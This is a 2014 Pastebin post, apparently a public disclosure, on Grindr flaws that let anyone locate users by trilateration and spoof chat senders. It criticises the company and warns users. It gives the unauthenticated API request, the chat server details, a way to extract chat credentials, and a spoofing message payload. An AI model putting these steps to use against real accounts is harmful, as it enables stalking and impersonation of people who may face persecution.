Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

[Grindr] errors and omissions 2014

By: a guest on Aug 16th, 2014  |  syntax: None  |  size: 5.15 KB  |  views: 42,998  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #
  2. # How Grindr[0] fails to protect their user's privacy by not implementing a secure chat.
  3. #
  4.  
  5. Just like 2012[1] and 2013[2], this year's "WTF? Why am I still using Grindr"-moment comes with the fact that
  6. it's possible to locate every single user and perform a sender spoof using the chat.
  7.  
  8. #
  9. # 1 Why public?
  10. #
  11. I know officials at grindr have been informed several times within the past months about these issues, which would seem to imply that the concept of "social responsibility" is lost upon Grindr. While you may live in a country where using Grindr is no big deal, there are countries like Sudan and Yemen where anti-gay laws have been enacted with severe consequences[3], e.g. the death penalty. Knowing that Grindr-Users in countries such as these are being put unnecessarily at a high risk should be reason enough for Grindr to change its system.
  12. Even without the such a risk: Would you want it to be possible for someone to show on a map, exactly where you are to the point where they could tell if you were using Grindr in the bathroom or on the couch?
  13.  
  14. #
  15. # 2 locating users
  16. # 2a general
  17. #
  18. Geo-based (dating) apps use the location of every user to show distances to each other. Using the same process as GPS satellites, it is possible for a malicious entity to perform a lateration[4], sending distance-requests from three different points and using the responses to calculate the exact position of a particular user.
  19.  
  20. #
  21. # 2b Grindr
  22. #
  23. Grindr sends very detailed distance information - and the best: no authentication required!
  24. To get a list the nearest 50 users around a location, send a POST-Request to https://primus.grindr.com/2.0/nearbyProfiles containing the following JSON-Object:
  25. {  
  26.    "filter":{  
  27.       "page":1,
  28.       "quantity":50
  29.    },
  30.    "lat":$LATITUDE$,
  31.    "lon":$LONGITUDE$
  32. }
  33.  
  34. You'll receive a response which also contains a JSON-Object:
  35. {
  36.         "profiles": [{
  37.                 "profileId": [REDACTED],
  38.                 "status": 1,
  39.                 "version": 1404857602,
  40.                 "profileImageMediaHash": "[REDACTED]",
  41.                 "age": 30,
  42.                 "showDistance": false, << Good boy!
  43.                 "showAge": true,
  44.                 "seen": 1408203579000,
  45.                 "isFavorite": false
  46.         }, {
  47.                 "profileId": [REDACTED],
  48.                 "status": 1,
  49.                 "displayName": "thomas",
  50.                 "headline": "give me tonight",
  51.                 "headlineDate": 1404857602000,
  52.                 "version": 1404857602,
  53.                 "profileImageMediaHash": "[REDACTED]",
  54.                 "age": 28,
  55.                 "showDistance": true,
  56.                 "showAge": true,
  57.                 "ethnicity": 7,
  58.                 "lookingFor": [4, 5, 3, 6],
  59.                 "relationshipStatus": 1,
  60.                 "bodyType": 5,
  61.                 "height": 172.0,
  62.                 "weight": 73935.5546875,
  63.                 "seen": 1408203078000,
  64.                 "distance": 0.723241061801939, << Base for locating
  65.                 "isFavorite": false
  66.         }, {
  67.                 ...
  68.         }]
  69. }
  70.  
  71. The first user chose not to show the their location, so we're not able to locate him.
  72. The second user has his location services on. If we were to perform that same request two more times at different longitudes/latitudes, we would have the necessary data to perform a trilateration, e.g. using a pythonscript[5] from the internet (three known points and distances, one unknown point (user)).
  73. Having now calculated the location of every user, it's trivial to show it on a map like this[6].
  74.  
  75. Note: Disable "show location"-flag to prevent being located in this way.
  76.  
  77. #
  78. # 3 Sender spoof
  79. #
  80. Grindr's chat runs via XMPP[7], an open standard for chatting. To send messages, you need an account created via the Grindr-App.
  81.  
  82. To login on grindr's XMPP-Servers, you simply connect to:
  83.  
  84. server: primus-prod-chat-0001.grindr.com
  85. port: 5222
  86. host: chat.grindr.com
  87.  
  88. The user ID and password must be known. (Capture your grindr's app traffic and watch out for the request sent to https://primus.grindr.com/2.0/session, the "xmppToken" within the response contains the password).
  89.  
  90. So far so good. The messages are not sent directly, but rather as JSON-Objects. It is at this point in which a sender-spoof can take place:
  91.  
  92. You simply send a message to another grindr user's ID (see profileId from #2b (locating guys on Grindr)) containing the following message:
  93. {  
  94.    "body":"TEXT GOES HERE",
  95.    "messageId":"[REDACTED]", << unique messageID
  96.    "sourceProfileId":"12345678", << who's texting? here you can enter ANY id and it will be shown as sender
  97.    "targetProfileId":"910111213", << who's receiving? important to put the grindr user's ID here.
  98.    "timestamp":[REDACTED],
  99.    "type":"text"
  100. }
  101.  
  102. Only the intended target will have knowledge of the spoofed message. The "sender" user-ID used for the spoof will not receive a copy.
  103.  
  104. Note: Grindr really need to get their priorities in order; The tons of ad- and tracking services are very well implemented in their App, however the core of grindr, the chat-protocol is completely insecure.
  105.  
  106. ##
  107. [0] http://grindr.com/
  108. [1] https://nakedsecurity.sophos.com/2012/01/20/grindr-hack/
  109. [2] https://www.os3.nl/_media/reports/grindr.pdf
  110. [3] https://www.bbc.com/news/world-25927595
  111. [4] https://en.wikipedia.org/wiki/Trilateration
  112. [5] https://gis.stackexchange.com/questions/66/trilateration-using-3-latitude-and-longitude-points-and-3-distances/415#415
  113. [6] https://www.anonimg.com/img/a88256042dade7e5f527fad8b5b69524.png
  114. [7] https://en.wikipedia.org/wiki/XMPP
  115. [8] https://en.wikipedia.org/wiki/Spoofing_attack
clone this paste RAW Paste Data